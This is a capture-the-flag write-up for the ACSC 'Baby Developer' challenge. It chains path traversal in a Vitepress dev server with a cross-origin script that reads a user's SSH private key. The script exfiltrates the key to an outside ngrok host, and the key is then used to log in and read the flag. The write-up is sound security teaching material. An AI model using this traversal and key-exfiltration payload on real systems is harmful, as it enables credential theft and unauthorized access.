Baby Developer
Directory traversal in insecure Vitepress development server leads to information disclosure through SSRF

Description

I made a mobile (apple watch miniminimini series 1337) viewer on my personal server.
  • http://baby-developer.chal.acsc.asia:8888/
  • ssh baby-developer.chal.acsc.asia -p2222

Solution

  • There is a genflag server that you are supposed to reach via SSRF
  • However, the remote address and User-Agent are checked, so you can't reach it directly from mobile-viewer
  • The pages are rendered as screenshots
```python
from flask import request

@app.route('/flag')
def hello_world():
    # `dev` is the permitted remote address; it is defined elsewhere in the challenge source
    if request.remote_addr == dev and 'iPhone' not in request.headers.get('User-Agent'):
        fp = open('/flag', 'r')
        flag = fp.read()
        return flag
    else:
        return "Nope.."
```
From mobile-viewer, we need the website host to request http://genflag/flag for us. This can be done with /home/stypr/readflag on website:
```dockerfile
# Challenge: get flag!
RUN touch /home/stypr/.hushlogin && \
    echo '#include <stdio.h>\r\n#include <stdlib.h>\r\nint main(){FILE *fp;char flag[1035];fp = popen("/usr/bin/curl -s http://genflag/flag", "r");if (fp == NULL) {printf("Error found. Please contact administrator.");exit(1);}while (fgets(flag, sizeof(flag), fp) != NULL) {printf("%s", flag);}pclose(fp);return 0;}' > /home/stypr/readflag.c && \
    gcc -o /home/stypr/readflag /home/stypr/readflag.c && \
    chmod +x /home/stypr/readflag && rm -rf /home/stypr/readflag.c
```
Refer to the website source. The website server runs yarn dev, which runs vitepress dev src.
Vitepress therefore runs in dev mode. I found that this enables CORS, allowing us to perform a CSRF to exfiltrate data. Furthermore, I found that there was a path traversal vulnerability, allowing us to get the SSH key: http://website/../../../../../home/stypr/.ssh/id_rsa
From mobile-viewer, we can make a request to our attacker site, which contains:
```html
<script>
fetch("http://website/../../../../../home/stypr/.ssh/id_rsa")
  .then(resp => resp.text())
  .then(data => fetch('http://0db7-115-66-195-39.ngrok.io/?' + btoa(data)))
</script>
```
Get the private key and SSH into the server to get the flag:
```shell
$ ssh [email protected] -p2222 -i id_rsa
ACSC{weird_bugs_pwned_my_system_too_late_to_get_my_CVE}
```